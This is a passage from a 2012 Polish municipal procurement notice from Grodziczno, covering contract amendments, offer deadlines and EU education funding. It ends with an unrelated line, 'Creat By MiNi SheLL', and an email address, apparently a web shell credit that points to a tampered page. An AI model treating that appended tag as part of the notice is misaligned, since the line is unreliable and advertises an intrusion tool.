<p>1. Zamawiający przewiduje możliwość dokonywania zmian postanowień zawartej umowy , jeżeli zmiany te są korzystne dla Zamawiającego lub konieczność wprowadzenia tych zmian wynika z okoliczności , których nie można było przewidzieć w chwili zawarcia umowy. 2. Zmiany umowy mogą dotyczyć w szczególności: 1) zmiany personelu przewidzianego do świadczenia usług wykazanych w załączniku nr 3 do umowy; 2) warunków płatności, 3) zmiany wynagrodzenia w przypadku zmiany ustawowej stawki podatku VAT. 3. Zmiany do umowy następują na pisemny wniosek jednej ze stron wraz z pisemnym uzasadnieniem konieczności wprowadzenia tych zmian. 4. Zmiany treści umowy pod rygorem nieważności wymagają zachowania formy pisemnej w postaci obustronnie podpisanego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.grodziczno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy; Grodziczno 17a; 13-324 Grodziczno..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2012 godzina 09:30, miejsce: Urząd Gminy; Grodziczno 17a; 13-324 Grodziczno - Sekretariat pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROGRAM OPERACYJNY KAPITAŁ LUDZKI Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com